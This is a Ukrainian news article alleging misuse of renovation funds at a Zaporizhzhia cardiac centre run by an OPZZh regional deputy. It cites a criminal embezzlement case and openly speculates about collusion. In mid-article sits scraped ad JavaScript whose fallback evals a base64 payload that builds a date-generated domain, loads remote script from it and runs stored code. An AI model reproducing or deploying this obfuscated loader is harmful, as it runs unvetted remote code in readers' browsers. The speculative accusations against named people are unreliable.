Як залишити будiвлю комунальної установи без ремонту, а бюджет без грошей

З початком війни партія «Опозиційна платформа – За життя» опинилася в Україні під забороною як проросійська. Але її представники, як у столиці, так і на місцях, нікуди не поділися. Звичайно, між вищою партійною номенклатурою та представниками на місцях існують відмінності. Але чи такі сильні вони насправді? Про одного з представників ОПЗЖ у Запоріжжі днями написав інформаційний ресурс Zabor.zp.ua. В свою чергу, «Акцент» вирішив проінформувати про це громадськість, розставивши наголоси, відповідно до свого бачення ситуації.

Мова про депутата Запорізької обласної ради від ОПЗЖ, директора КНП «Запорізький обласний медичний центр серцево-судинних захворювань» I.М. Курпаяніді.

На своїй сторінці в Facebook, яку Іван Курпаяніді почав вести перед виборами, 9 жовтня 2020 року, а припинив одразу після виборів, 13 грудня, свій вибір партії він пояснював тим, що владні попередники виявилися некомпетентними, а «ОПЗЖ – это общенациональная политическая сила… мы не будем трагично разводить руками, а будем усердно трудиться на общее благо» (тут і далі цитуємо оригінальний стиль фейсбуку І.М. Курпаяніді).

Далi очiльник кардіоцентру писав: «Вирішив іти у депутати, бо дефіцит бюджету медицини у Запорізькій області — понад 400 мільйонів гривень». Можливо, для 2020 року це і було актуальним твердженням, але ще в 2018 році з грошима все було більш ніж непогано. І при цьому міцний господарник Курпаяніді чомусь освоїти їх належним чином не зумів. Детально все виглядає наступним чином.

28.02.2018 року Департамент охорони здоров’я Запорізької облдержадміністрації своїм наказом №243 ухвалив витрати на капітальний ремонт очолюваної І.М. Курпаяніді установи в сумі 31 мільйон 110 тисяч 779 гривень.

Чомусь аж через п’ять місяців, 3 серпня 2018 року, КНП «Запорізький обласний медичний центр серцево-судинних захворювань» було оголошено тендер на ремонтні роботи, в якому перемогло ТОВ «АМД Будсервіс» з пропозицією в 26 020 432 гривні.

Це безумовно суперечить наступним, всоьго лише через два з половиною роки, передвиборчим заявам Курпаяніді щодо «мизерного финансирования, губительного реформирования и полного отрыва от реальности нынешнего руководства – я не смог остаться в стороне. Кто, если не мы? Кто, если не я?» Бо ж «відірвані від реальності керівники» виділили більше мільйона доларів на комплексний капремонт будiвлi комунального неприбуткового підприємства.

Але головне не суперечливість заяв І.М. Курпаяніді — зрештою передвиборчий піар завжди грішить цим — а той факт, що виділені кошти він не тільки не зміг освоїти, а ще й створив загрозу фінансового скандалу.

Відомо, що гроші на подібні проекти виділяються як з місцевого бюджету, так і з Державного фонду регіонального розвитку, в якому задіяні і кошти міжнародних донорів. Останнi фінансують вирішення глобальних українських проблем, сподіваючись допомогти нашій державі на шляху до цивілізованого міжнародного співтовариства.

Однією з цільових програм є підвищення енергоефективності споруд в бюджетнiй сферi України. Тобто утеплити збудовану за радянськими стандартами лікарню мінеральною ватою і панелями, і таким чином зменшити на порядок регулярні витрати на її опалення – це проект, який має високі шанси отримати зарубіжне фінансування. Але закордонні донори вкрай негативно ставляться до спроб пускати гроші не за призначенням, ба більше — розкрадати їх.
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

На свiтлинї Курпаяніді у Facebook на задньому плані зображено фасад головного входу до утепленої та облицьованої будівлі кардіоцентру. На жаль, так виглядає лише ця частина будівлі. В інших місцях очевидний не закінчений ремонт — з мінеральною ватою, що стирчить, і без зовнішніх панелей. Виникає питання: можливо, на всі роботи не було виділено кошти? Виявляється, ні, гроші виділялися.

Так у чому ж справа? Цим питанням задалися й у правоохоронних органах. І зареєстровали у ЄРДР 14 травня 2020 року кримінальне провадження №42020081060000019 за частиною 3 статті 191 Кримінального кодексу України: привласнення, розтрата майна або заволодіння ним шляхом зловживання службовим становищем. Міра покарання за цією статтею — до 12 років ув’язнення з конфіскацією майна.

Згідно з матеріалами справи, вона розглядалася за фактом розтрати коштів посадовими особами КНП «Обласний медичний центр серцево-судинних захворювань» Запорізької обласної ради за попередньою змовою з керівником ТОВ «АМД Будсервіс» та іншими не встановленими особами.

За показами свідків, «під час проведення робіт, пов’язаних з облицюванням фасадної частини корпуса КНП «Обласний медичний центр серцево-судинних захворювань» зазначалось використання металевих листів товщиною 0,05 см, а фактично встановлювали листи товщиною 0,02 см. Вказані випадки мали системний характер і під час виконання інших додаткових робіт». Наприклад, стверджується, що замість металочерепиці «Monterrey Ruuki Plus» використовувалася черепиця кустарного виготовлення. Ну, і так далі.

На жаль, останнє судове засідання по справі пройшло ще влітку 2021 року. Тодi слідчий Нацполіції звернувся до І.М. Курпаяніді стосовно доступу до речей і документів по кримінальному провадженню, згідно ухвали суду від 21 липня.

Але що було далі, історія замовчує. Чи відбулося вилучення документів і яких висновків дійшло слідство? Або, можливо, зацікавлені особи вжили свій вплив, і кримінальну справу поклали у довгу скриньку? І наскільки винен чи не винен Курпаяніді, який стверджує, що всі кошти для виконання робіт підряднику виділялися — у той час як субпідрядники (ті самі свідки) повідомляли як про порушення у якостi робiт, так i про те, що з якогось моменту оплата їхньої праці була зупинена.

З іншого боку, у відкритих джерелах є відомості про те, що ТОВ «АМД Будсервіс» тісно пов’язане з іншим депутатом Запорізької обласної ради, і тоді як варіант можна припустити, що два депутати вдарили по руках і «освоїли» бюджетні мільйони. А цапом відбувайлом зробили фірму-підрядника, яка на сьогодні, згідно з офіційною інформацією, припинила свою діяльність і станом на 01.11.2021 року перебуває на обліку в контролюючому органі як така, що визнана банкрутом.

UHVALA

(adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/yak-zalishiti-budivlyu-komunalnoyi-ustanovi-bez-remontu-a-byudzhet-bez-groshej/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top